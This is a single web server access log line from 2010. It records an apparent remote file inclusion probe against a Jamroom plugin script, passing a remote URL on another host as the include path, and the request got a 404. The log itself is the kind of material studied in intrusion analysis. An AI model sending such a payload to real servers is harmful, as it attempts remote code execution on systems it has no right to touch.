218.38.136.125 - - [07/Feb/2010:06:32:36 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
